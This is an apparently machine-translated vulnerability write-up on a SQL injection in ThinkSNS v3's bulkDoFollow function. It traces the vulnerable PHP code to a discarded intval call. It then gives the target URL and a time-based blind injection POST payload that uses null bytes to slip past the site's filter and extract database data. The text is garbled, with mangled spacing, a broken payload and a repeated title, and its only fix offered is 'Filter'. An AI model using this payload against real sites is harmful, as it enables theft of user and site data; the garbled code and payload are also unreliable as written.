ThinkSNS defense bypass ideas (union select truly unrestricted SQL injection)

ThinkSNS defense bypass ideas (union select truly unrestricted SQL injection)

ThinkSNS defense bypass ideas (union select truly unrestricted SQL injection)

Public function bulkDoFollow () {// security filter $ res = $ this-> _ follow_model-> bulkDoFollow ($ this-> mid, t ($ _ POST ['fids ']); $ this-> ajaxReturn ($ res, $ this-> _ follow_model-> getError (), false! ==$ Res );}

Follow up with bulkDoFollow

public function bulkDoFollow($uid, $fids) {$follow_states = $this->getFollowStateByFids($uid, $fids);

Follow-up: getFollowStateByFids
 

public function getFollowStateByFids($uid, $fids) {array_map( 'intval' , $fids);$_fids = is_array($fids) ? implode(',', $fids) : $fids;if(empty($_fids)) {return array();}$follow_data = $this->where(" ( uid = '{$uid}' AND fid IN({$_fids}) ) OR ( uid IN({$_fids}) and fid = '{$uid}')")->findAll();$follow_states = $this->_formatFollowState($uid, $fids, $follow_data);

Looking at a piece of Logic
 

array_map( 'intval' , $fids);$_fids = is_array($fids) ? implode(',', $fids) : $fids;

If fids is a string

Array_map ('intval', ", 3"); this will warn, but the program will continue to execute

This causes injection.

Sending url:

Http: // localhost/thinksns_v3.20.20131108_28822/index. php? App = public & mod = Follow & act = bulkDoFollow

Postdata:

Fids = 00ct, if (ascii (substr (sele % user () fr % 00om ts_atme limit), slee % 00 p (3), 1) =, 1 )))#

The whole site information can be guessed.
 

Solution:

Filter